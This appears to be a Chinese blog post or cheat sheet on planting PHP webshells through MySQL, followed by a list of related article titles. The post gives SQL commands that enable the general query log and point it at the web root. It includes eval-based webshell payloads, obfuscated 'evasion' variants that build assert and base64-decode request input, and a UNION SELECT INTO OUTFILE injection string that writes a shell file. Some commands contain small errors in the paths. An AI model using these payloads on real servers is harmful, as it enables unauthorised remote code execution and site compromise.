Mysql 写shell

一、后台日志写shell

前提:

  • 需要有root权限
  • outfile被禁止
  • 文件写入被拦截

1、查看配置

  • 是否开启写日志
  • 日志写入路径
show variables like '%general%';

2、开启general log模式为on

set global general_log = on;

3、设置目录为shell地址

set global general_log_file = '/var/www/html';

4、写入shell

select '<?php eval($_POST[cmd])?>';

【注意】:sql免杀语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>";select "<?php $sl = create_function('', @$_REQUEST['klion']);$sl();?>";

二、into_oufile读写文件

需求:找到网站的绝对路径

1、找出注入

2、写入shell

1' union select 1,2,'<?php @eval($_POST[darkid]);?>' into outfile '/var/www/hetml/shell.php?>' --+

Mysql 后台日志写shell(root权限)相关推荐

  1. SQL语句利用日志写shell

    outfile被禁止,或者写入文件被拦截: 在数据库中操作如下:(必须是root权限) show variables like '%general%'; #查看配置 set global genera ...

  2. linux mysql general_利用mysql general log 写shell 可行性简要分析

    0×01 前言 实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfile写shell的时候,却怎么都写不进去,前提可以肯定的是,我们对目 ...

  3. 转adb Shell root 权限

    永久root带文件 因为开发需要,我经常会用到adb这个工具(Android Debug Bridge),我们都知道adb shell默认是没有root权限的,修改系统文件就很不方便了,adb pus ...

  4. Mysql 创建新用户授予root权限 或 最高权限

    普通创建用户 普通用户创建成功后一般没权限,权限不足操作和查看数据库权限不足 > CREATE USER 'username'@'%' IDENTIFIED BY 'password'; > ...

  5. 解决adb shell root权限

    adb shell默认是没有root权限的,修改系统文件就很不方便.有两种方法可以获取adb shell的root权限,这两种方法的前提都是手机已经root. 1.用su可以提权,直接执行su就会看到 ...

  6. phpmyadmin通过日志写shell

    1.查看general log是否开启 show variables like '%general%'; 打开general_log日志读写功能 SET GLOBAL general_log='on' ...

  7. android 执行shell root权限,Android App 获取root权限后,执行shell命令

    背景: 做一个应用,需求是获取root权限后可以停用/启用某些应用,包括系统应用!停用的应用将不在设置-->应用中展示,大部分系统自带的桌面应该也不会再显示! 如果是用menifest.xml中 ...

  8. Debian9 安装MySQL 以及普通用户获得root权限安装sudo

    点击看原文 转载于:https://www.cnblogs.com/Neil223/p/10375344.html

  9. insert into user mysql root_跳过授权表登录后使用insert into创建root权限用户

    起因: 刚刚搭建好的mysql数据库,做基础优化时,不小心把所有用户都删除了,并且退出了.没办法,只好跳过授权表登录,新建root用户. 过程如下: 一.停掉mysql,跳过授权登录 [root@ex ...

最新文章

  1. Windows Phone 7 自动完成输入框控件AutoCompleteBox
  2. Linux2.6内核驱动与2.4的区别 .
  3. 303. 区域和检索 - 数组不可变
  4. java判断某个字符串是否是数字
  5. C#的变迁史01 - C# 1.0篇
  6. python用scrapy爬虫豆瓣_Python-用Scrapy爬取豆瓣电影
  7. 5-1 duck typing的概念
  8. codeforce 贪心1
  9. JasperReport| JasperReport中使用自定义字体(font)
  10. OpenCV摄像头标定
  11. python矩形法计算定积分_矩形、梯形法计算定积分的黎曼和
  12. selenium滑块拖动验证(携程)
  13. android音频服务,android-在后台服务中录制音频
  14. TPH-YOLOv5: Improved YOLOv5 Based on Transformer Prediction Head forObject Detection on Drone-captur
  15. web前端技术社区分享
  16. 自制html5拖拽功能实现的拼图游戏
  17. Modbus通信协议规范(中文)分享
  18. 毕设笔记01-解决树莓派烧写系统显示屏不显示问题
  19. 4个口碑贼好的微信小程序,低调收藏,免费使用!
  20. 万能工具箱万能工具箱_系统管理员工具箱的10个有用工具

热门文章

  1. FTP,SFTP,HTTP,HTTPS网络传输协议
  2. 项目实施计划及总体设计报告(范例)
  3. 【WebService】第五章、WSDL文件详解
  4. 优化函数SGD/AdaGrad/AdaDelta/Adam/Nadam
  5. qss font-family常用的黑体宋体等字体中英文对照
  6. java计算机毕业设计项目材料管理系统源代码+数据库+系统+lw文档
  7. 惠普83752B高功率合成扫频器,20 GHz
  8. HttpSession的常见用法(javaWeb)
  9. java毕业设计二次元信息分享平台mybatis+源码+调试部署+系统+数据库+lw
  10. CSS — 让网页美起来(一)